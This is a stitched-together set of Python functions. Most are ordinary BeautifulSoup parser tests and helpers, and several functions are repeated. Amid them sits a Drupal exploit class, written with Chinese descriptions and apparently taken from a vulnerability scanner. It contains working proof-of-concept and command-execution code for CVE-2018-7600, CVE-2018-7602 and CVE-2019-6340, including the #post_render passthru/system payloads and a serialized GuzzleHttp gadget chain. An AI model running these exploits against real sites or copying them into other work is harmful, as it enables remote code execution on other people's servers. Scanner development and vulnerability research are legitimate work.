def fragmentClass(self): from thirdparty.bs4 import BeautifulSoup # TODO: Why is the parser 'html.parser' here? To avoid an # infinite loop? self.soup = BeautifulSoup("", "html.parser") self.soup.name = "[document_fragment]" return Element(self.soup, self.soup, None)
def assertSoupEquals(self, to_parse, compare_parsed_to=None): builder = self.default_builder obj = BeautifulSoup(to_parse, builder=builder) if compare_parsed_to is None: compare_parsed_to = to_parse self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))
def test_custom_builder_class(self): # Verify that you can pass in a custom Builder class and # it'll be instantiated with the appropriate keyword arguments. class Mock(object): def __init__(self, **kwargs): self.called_with = kwargs self.is_xml = True self.store_line_numbers = False self.cdata_list_attributes = [] self.preserve_whitespace_tags = [] self.string_containers = {} def initialize_soup(self, soup): pass def feed(self, markup): self.fed = markup def reset(self): pass def ignore(self, ignore): pass set_up_substitutions = can_be_empty_element = ignore def prepare_markup(self, *args, **kwargs): yield "prepared markup", "original encoding", "declared encoding", "contains replacement characters" kwargs = dict( var="value", # This is a deprecated BS3-era keyword argument, which # will be stripped out. convertEntities=True, ) with warnings.catch_warnings(record=True): soup = BeautifulSoup('', builder=Mock, **kwargs) assert isinstance(soup.builder, Mock) self.assertEqual(dict(var="value"), soup.builder.called_with) self.assertEqual("prepared markup", soup.builder.fed) # You can also instantiate the TreeBuilder yourself. In this # case, that specific object is used and any keyword arguments # to the BeautifulSoup constructor are ignored. builder = Mock(**kwargs) with warnings.catch_warnings(record=True) as w: soup = BeautifulSoup( '', builder=builder, ignored_value=True, ) msg = str(w[0].message) assert msg.startswith( "Keyword arguments to the BeautifulSoup constructor will be ignored." ) self.assertEqual(builder, soup.builder) self.assertEqual(kwargs, builder.called_with)
def test_formatter_processes_script_tag_for_xml_documents(self): doc = """ <script type="text/javascript"> </script> """ soup = BeautifulSoup(doc, "lxml-xml") # lxml would have stripped this while parsing, but we can add # it later. soup.script.string = 'console.log("< < hey > > ");' encoded = soup.encode() self.assertTrue(b"< < hey > >" in encoded)
def test_beautifulsoup_constructor_does_lookup(self): with warnings.catch_warnings(record=True) as w: # This will create a warning about not explicitly # specifying a parser, but we'll ignore it. # You can pass in a string. BeautifulSoup("", features="html") # Or a list of strings. BeautifulSoup("", features=["html", "fast"]) # You'll get an exception if BS can't find an appropriate # builder. self.assertRaises(ValueError, BeautifulSoup, "", features="no-such-feature")
def ISPCheck(domain): try: base = 'https://check-host.net/ip-info?host=' + domain base_check = requests.get(base).text UrlHTML = BeautifulSoup(base_check, "lxml") if UrlHTML.findAll('div', {'class':'error'}): get_Content = " - cannot retrieve information " return get_Content get_Content = str([i for i in UrlHTML.findAll('tr', {'class':'zebra'}) if 'Organization' in str(i)][0].get_text(strip=True).split('Organization')[1]) for cloud in cloudlist: if cloud in get_Content: get_Content = " - belong " + cloud return get_Content except: return None
def benchmark_parsers(num_elements=100000): """Very basic head-to-head performance benchmark.""" print("Comparative parser benchmark on Beautiful Soup %s" % __version__) data = rdoc(num_elements) print("Generated a large invalid HTML document (%d bytes)." % len(data)) for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]: success = False try: a = time.time() soup = BeautifulSoup(data, parser) b = time.time() success = True except Exception as e: print("%s could not parse the markup." % parser) traceback.print_exc() if success: print("BS4+%s parsed the markup in %.2fs." % (parser, b - a)) from lxml import etree a = time.time() etree.HTML(data) b = time.time() print("Raw lxml parsed the markup in %.2fs." % (b - a)) from thirdparty import html5lib parser = html5lib.HTMLParser() a = time.time() parser.parse(data) b = time.time() print("Raw html5lib parsed the markup in %.2fs." % (b - a))
def assertSoupEquals(self, to_parse, compare_parsed_to=None): builder = self.default_builder obj = BeautifulSoup(to_parse, builder=builder) if compare_parsed_to is None: compare_parsed_to = to_parse # Verify that the documents come out the same. self.assertEqual(obj.decode(), self.document_for(compare_parsed_to)) # Also run some checks on the BeautifulSoup object itself: # Verify that every tag that was opened was eventually closed. # There are no tags in the open tag counter. assert all(v==0 for v in list(obj.open_tag_counter.values())) # The only tag in the tag stack is the one for the root # document. self.assertEqual( [obj.ROOT_TAG_NAME], [x.name for x in obj.tagStack] )
def __init__(self, namespaceHTMLElements, soup=None, store_line_numbers=True, **kwargs): if soup: self.soup = soup else: from thirdparty.bs4 import BeautifulSoup # TODO: Why is the parser 'html.parser' here? To avoid an # infinite loop? self.soup = BeautifulSoup("", "html.parser", store_line_numbers=store_line_numbers, **kwargs) # TODO: What are **kwargs exactly? Should they be passed in # here in addition to/instead of being passed to the BeautifulSoup # constructor? super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements) # This will be set later to an html5lib.html5parser.HTMLParser # object, which we can use to track the current line number. self.parser = None self.store_line_numbers = store_line_numbers
def test_last_ditch_entity_replacement(self): # This is a UTF-8 document that contains bytestrings # completely incompatible with UTF-8 (ie. encoded with some other # encoding). # # Since there is no consistent encoding for the document, # Unicode, Dammit will eventually encode the document as UTF-8 # and encode the incompatible characters as REPLACEMENT # CHARACTER. # # If chardet is installed, it will detect that the document # can be converted into ISO-8859-1 without errors. This happens # to be the wrong encoding, but it is a consistent encoding, so the # code we're testing here won't run. # # So we temporarily disable chardet if it's present. doc = b"""\357\273\277<?xml version="1.0" encoding="UTF-8"?> <html><b>\330\250\330\252\330\261</b> <i>\310\322\321\220\312\321\355\344</i></html>""" chardet = bs4.dammit.chardet_dammit logging.disable(logging.WARNING) try: def noop(str): return None bs4.dammit.chardet_dammit = noop dammit = UnicodeDammit(doc) self.assertEqual(True, dammit.contains_replacement_characters) self.assertTrue("\ufffd" in dammit.unicode_markup) soup = BeautifulSoup(doc, "html.parser") self.assertTrue(soup.contains_replacement_characters) finally: logging.disable(logging.NOTSET) bs4.dammit.chardet_dammit = chardet
def searchTitle(domain): html = requests.get('http://' + domain).text soup = BeautifulSoup(html, 'html.parser') title = soup.find('title').string return title
class TreeBuilderForHtml5lib(treebuilder_base.TreeBuilder): def __init__(self, namespaceHTMLElements, soup=None, store_line_numbers=True, **kwargs): if soup: self.soup = soup else: from thirdparty.bs4 import BeautifulSoup # TODO: Why is the parser 'html.parser' here? To avoid an # infinite loop? self.soup = BeautifulSoup("", "html.parser", store_line_numbers=store_line_numbers, **kwargs) # TODO: What are **kwargs exactly? Should they be passed in # here in addition to/instead of being passed to the BeautifulSoup # constructor? super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements) # This will be set later to an html5lib.html5parser.HTMLParser # object, which we can use to track the current line number. self.parser = None self.store_line_numbers = store_line_numbers def documentClass(self): self.soup.reset() return Element(self.soup, self.soup, None) def insertDoctype(self, token): name = token["name"] publicId = token["publicId"] systemId = token["systemId"] doctype = Doctype.for_name_and_ids(name, publicId, systemId) self.soup.object_was_parsed(doctype) def elementClass(self, name, namespace): kwargs = {} if self.parser and self.store_line_numbers: # This represents the point immediately after the end of the # tag. We don't know when the tag started, but we do know # where it ended -- the character just before this one. sourceline, sourcepos = self.parser.tokenizer.stream.position() kwargs['sourceline'] = sourceline kwargs['sourcepos'] = sourcepos - 1 tag = self.soup.new_tag(name, namespace, **kwargs) return Element(tag, self.soup, namespace) def commentClass(self, data): return TextNode(Comment(data), self.soup) def fragmentClass(self): from thirdparty.bs4 import BeautifulSoup # TODO: Why is the parser 'html.parser' here? To avoid an # infinite loop? self.soup = BeautifulSoup("", "html.parser") self.soup.name = "[document_fragment]" return Element(self.soup, self.soup, None) def appendChild(self, node): # XXX This code is not covered by the BS4 tests. self.soup.append(node.element) def getDocument(self): return self.soup def getFragment(self): return treebuilder_base.TreeBuilder.getFragment(self).element def testSerializer(self, element): from thirdparty.bs4 import BeautifulSoup rv = [] doctype_re = re.compile( r'^(.*?)(?: PUBLIC "(.*?)"(?: "(.*?)")?| SYSTEM "(.*?)")?$') def serializeElement(element, indent=0): if isinstance(element, BeautifulSoup): pass if isinstance(element, Doctype): m = doctype_re.match(element) if m: name = m.group(1) if m.lastindex > 1: publicId = m.group(2) or "" systemId = m.group(3) or m.group(4) or "" rv.append("""|%s<!DOCTYPE %s "%s" "%s">""" % (' ' * indent, name, publicId, systemId)) else: rv.append("|%s<!DOCTYPE %s>" % (' ' * indent, name)) else: rv.append("|%s<!DOCTYPE >" % (' ' * indent, )) elif isinstance(element, Comment): rv.append("|%s<!-- %s -->" % (' ' * indent, element)) elif isinstance(element, NavigableString): rv.append("|%s\"%s\"" % (' ' * indent, element)) else: if element.namespace: name = "%s %s" % (prefixes[element.namespace], element.name) else: name = element.name rv.append("|%s<%s>" % (' ' * indent, name)) if element.attrs: attributes = [] for name, value in list(element.attrs.items()): if isinstance(name, NamespacedAttribute): name = "%s %s" % (prefixes[name.namespace], name.name) if isinstance(value, list): value = " ".join(value) attributes.append((name, value)) for name, value in sorted(attributes): rv.append('|%s%s="%s"' % (' ' * (indent + 2), name, value)) indent += 2 for child in element.children: serializeElement(child, indent) serializeElement(element, 0) return "\n".join(rv)
def test_warning_if_parser_specified_too_vague(self): with warnings.catch_warnings(record=True) as w: soup = BeautifulSoup("<a><b></b></a>", "html") self._assert_no_parser_specified(w)
def soup(self, markup, **kwargs): """Build a Beautiful Soup object from markup.""" builder = kwargs.pop('builder', self.default_builder) return BeautifulSoup(markup, builder=builder, **kwargs)
def cve_2018_7602_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Drupal: CVE-2018-7602" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Drupal drupalgeddon2 remote code execution" self.vul_info["vul_numb"] = "CVE-2018-7602" self.vul_info["vul_apps"] = "Drupal" self.vul_info["vul_date"] = "2018-06-19" self.vul_info["vul_vers"] = "< 7.59, < 8.5.3" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \ "攻击者可以通过不同方式利用该漏洞远程执行代码。" \ "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。" self.vul_info["cre_date"] = "2021-01-29" self.vul_info["cre_auth"] = "zhzyker" DRUPAL_U = "admin" DRUPAL_P = "admin" md = random_md5() cmd = "echo " + md try: self.session = requests.Session() self.get_params = {'q': 'user/login'} self.post_params = { 'form_id': 'user_login', 'name': DRUPAL_U, 'pass': DRUPAL_P, 'op': 'Log in' } self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.get_params = {'q': 'user'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.user_id = self.soup.find('meta', { 'property': 'foaf:name' }).get('about') if "?q=" in self.user_id: self.user_id = self.user_id.split("=")[1] self.get_params = {'q': self.user_id + '/cancel'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_token = self.form.find('input', { 'name': 'form_token' }).get('value') self.get_params = { 'q': self.user_id + '/cancel', 'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd } self.post_params = { 'form_id': 'user_cancel_confirm_form', 'form_token': self.form_token, '_triggering_element_name': 'form_id', 'op': 'Cancel account' } self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_build_id = self.form.find('input', { 'name': 'form_build_id' }).get('value') self.get_params = { 'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id } self.post_params = {'form_build_id': self.form_build_id} self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(self.r.text, md): self.vul_info["vul_data"] = dump.dump_all(self.r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" else: self.request = requests.get(self.url + "/CHANGELOG.txt", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])", self.request.text) if self.request.status_code == 200 and r"Drupal" in self.request.text: if '7.59' not in self.allver and '8.5.3' not in self.allver: self.vul_info["vul_data"] = dump.dump_all( self.r).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd self.vul_info[ "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2018_7602_exp(self, cmd): vul_name = "Drupal: CVE-2018-7602" DRUPAL_U = "admin" DRUPAL_P = "admin" try: self.session = requests.Session() self.get_params = {'q': 'user/login'} self.post_params = { 'form_id': 'user_login', 'name': DRUPAL_U, 'pass': DRUPAL_P, 'op': 'Log in' } self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.get_params = {'q': 'user'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.user_id = self.soup.find('meta', { 'property': 'foaf:name' }).get('about') if "?q=" in self.user_id: self.user_id = self.user_id.split("=")[1] self.get_params = {'q': self.user_id + '/cancel'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_token = self.form.find('input', { 'name': 'form_token' }).get('value') self.get_params = { 'q': self.user_id + '/cancel', 'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd } self.post_params = { 'form_id': 'user_cancel_confirm_form', 'form_token': self.form_token, '_triggering_element_name': 'form_id', 'op': 'Cancel account' } self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_build_id = self.form.find('input', { 'name': 'form_build_id' }).get('value') self.get_params = { 'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id } self.post_params = {'form_build_id': self.form_build_id} self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore') verify.exploit_print(self.r.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
class Drupal(): def __init__(self, url): self.url = url if self.url[-1] == "/": self.url = self.url[:-1] self.raw_data = None self.vul_info = {} self.ua = globals.get_value("UA") # 获取全局变量UA self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS self.threadLock = threading.Lock() self.payload_cve_2018_7600 = ( "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail" "[#type]=markup&mail[#markup]=RECOMMAND") self.payload_cve_2019_6340 = "{\r\n\"link\":[\r\n{\r\n\"value\":\"link\",\r\n\"options\":\"O:24:\\\"" \ "GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\"" \ ";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp" \ "\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \ "u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \ "u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve" \ "\\\";}}\"\r\n}\r\n],\r\n\"_links\":{\r\n\"type\":{\r\n\"href\":\"%s/rest/type/shortcut/default" \ "\"\r\n}\r\n}\r\n}" def cve_2018_7600_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Drupal: CVE-2018-7600" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2018_7600.replace( "RECOMMAND", "whoami") self.vul_info[ "vul_name"] = "Drupal drupalgeddon2 remote code execution" self.vul_info["vul_numb"] = "CVE-2018-7600" self.vul_info["vul_apps"] = "Drupal" self.vul_info["vul_date"] = "2018-04-13" self.vul_info["vul_vers"] = "6.x, 7.x, 8.x" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容" \ ",此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。" self.vul_info["cre_date"] = "2021-01-29" self.vul_info["cre_auth"] = "zhzyker" md = random_md5() cmd = "echo " + md self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd) self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" try: request = requests.post(self.url + self.path, data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(request.text, md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release() def cve_2018_7602_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Drupal: CVE-2018-7602" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Drupal drupalgeddon2 remote code execution" self.vul_info["vul_numb"] = "CVE-2018-7602" self.vul_info["vul_apps"] = "Drupal" self.vul_info["vul_date"] = "2018-06-19" self.vul_info["vul_vers"] = "< 7.59, < 8.5.3" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \ "攻击者可以通过不同方式利用该漏洞远程执行代码。" \ "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。" self.vul_info["cre_date"] = "2021-01-29" self.vul_info["cre_auth"] = "zhzyker" DRUPAL_U = "admin" DRUPAL_P = "admin" md = random_md5() cmd = "echo " + md try: self.session = requests.Session() self.get_params = {'q': 'user/login'} self.post_params = { 'form_id': 'user_login', 'name': DRUPAL_U, 'pass': DRUPAL_P, 'op': 'Log in' } self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.get_params = {'q': 'user'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.user_id = self.soup.find('meta', { 'property': 'foaf:name' }).get('about') if "?q=" in self.user_id: self.user_id = self.user_id.split("=")[1] self.get_params = {'q': self.user_id + '/cancel'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_token = self.form.find('input', { 'name': 'form_token' }).get('value') self.get_params = { 'q': self.user_id + '/cancel', 'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd } self.post_params = { 'form_id': 'user_cancel_confirm_form', 'form_token': self.form_token, '_triggering_element_name': 'form_id', 'op': 'Cancel account' } self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_build_id = self.form.find('input', { 'name': 'form_build_id' }).get('value') self.get_params = { 'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id } self.post_params = {'form_build_id': self.form_build_id} self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(self.r.text, md): self.vul_info["vul_data"] = dump.dump_all(self.r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" else: self.request = requests.get(self.url + "/CHANGELOG.txt", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])", self.request.text) if self.request.status_code == 200 and r"Drupal" in self.request.text: if '7.59' not in self.allver and '8.5.3' not in self.allver: self.vul_info["vul_data"] = dump.dump_all( self.r).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd self.vul_info[ "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release() def cve_2019_6340_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Drupal: CVE-2019-6340" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "drupal core restful remote code execution" self.vul_info["vul_numb"] = "CVE-2019-6340" self.vul_info["vul_apps"] = "Drupal" self.vul_info["vul_date"] = "2019-02-22" self.vul_info["vul_vers"] = "< 8.6.10" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "POST/PATCH 请求,在进行 REST API 操作的过程中,会将未经安全过滤的参数内容带入unserialize " \ "函数而触发反序列化漏洞,进而导致任意代码执行。" self.vul_info["cre_date"] = "2021-01-29" self.vul_info["cre_auth"] = "zhzyker" self.path = "/node/?_format=hal_json" md = random_md5() cmd = "echo " + md self.cmd_len = len(cmd) self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd, self.url) self.headers = { 'User-Agent': self.ua, 'Connection': "close", 'Content-Type': "application/hal+json", 'Accept': "*/*", 'Cache-Control': "no-cache" } try: request = requests.post(self.url + self.path, data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(request.text, md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_urls"] = self.payload self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release() def cve_2018_7600_exp(self, cmd): vul_name = "Drupal: CVE-2018-7600" self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd) self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" try: request = requests.post(self.url + self.path, data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name) def cve_2018_7602_exp(self, cmd): vul_name = "Drupal: CVE-2018-7602" DRUPAL_U = "admin" DRUPAL_P = "admin" try: self.session = requests.Session() self.get_params = {'q': 'user/login'} self.post_params = { 'form_id': 'user_login', 'name': DRUPAL_U, 'pass': DRUPAL_P, 'op': 'Log in' } self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.get_params = {'q': 'user'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.user_id = self.soup.find('meta', { 'property': 'foaf:name' }).get('about') if "?q=" in self.user_id: self.user_id = self.user_id.split("=")[1] self.get_params = {'q': self.user_id + '/cancel'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_token = self.form.find('input', { 'name': 'form_token' }).get('value') self.get_params = { 'q': self.user_id + '/cancel', 'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd } self.post_params = { 'form_id': 'user_cancel_confirm_form', 'form_token': self.form_token, '_triggering_element_name': 'form_id', 'op': 'Cancel account' } self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_build_id = self.form.find('input', { 'name': 'form_build_id' }).get('value') self.get_params = { 'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id } self.post_params = {'form_build_id': self.form_build_id} self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore') verify.exploit_print(self.r.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name) def cve_2019_6340_exp(self, cmd): vul_name = "Drupal: CVE-2019-6340" self.path = "/node/?_format=hal_json" self.cmd_len = len(cmd) self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd, self.url) self.headers = { 'User-Agent': self.ua, 'Connection': "close", 'Content-Type': "application/hal+json", 'Accept': "*/*", 'Cache-Control': "no-cache" } try: request = requests.post(self.url + self.path, data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def diagnose(data): """Diagnostic suite for isolating common problems. :param data: A string containing markup that needs to be explained. :return: None; diagnostics are printed to standard output. """ print("Diagnostic running on Beautiful Soup %s" % __version__) print("Python version %s" % sys.version) basic_parsers = ["html.parser", "html5lib", "lxml"] for name in basic_parsers: for builder in builder_registry.builders: if name in builder.features: break else: basic_parsers.remove(name) print(( "I noticed that %s is not installed. Installing it may help." % name)) if 'lxml' in basic_parsers: basic_parsers.append("lxml-xml") try: from lxml import etree print("Found lxml version %s" % ".".join(map(str, etree.LXML_VERSION))) except ImportError as e: print("lxml is not installed or couldn't be imported.") if 'html5lib' in basic_parsers: try: from thirdparty import html5lib print("Found html5lib version %s" % html5lib.__version__) except ImportError as e: print("html5lib is not installed or couldn't be imported.") if hasattr(data, 'read'): data = data.read() elif data.startswith("http:") or data.startswith("https:"): print('"%s" looks like a URL. Beautiful Soup is not an HTTP client.' % data) print( "You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup." ) return else: try: if os.path.exists(data): print( '"%s" looks like a filename. Reading data from the file.' % data) with open(data) as fp: data = fp.read() except ValueError: # This can happen on some platforms when the 'filename' is # too long. Assume it's data and not a filename. pass print() for parser in basic_parsers: print("Trying to parse your markup with %s" % parser) success = False try: soup = BeautifulSoup(data, features=parser) success = True except Exception as e: print("%s could not parse the markup." % parser) traceback.print_exc() if success: print("Here's what %s did with the markup:" % parser) print(soup.prettify()) print("-" * 80)
def test_no_warning_if_explicit_parser_specified(self): with warnings.catch_warnings(record=True) as w: soup = BeautifulSoup("<a><b></b></a>", "html.parser") self.assertEqual([], w)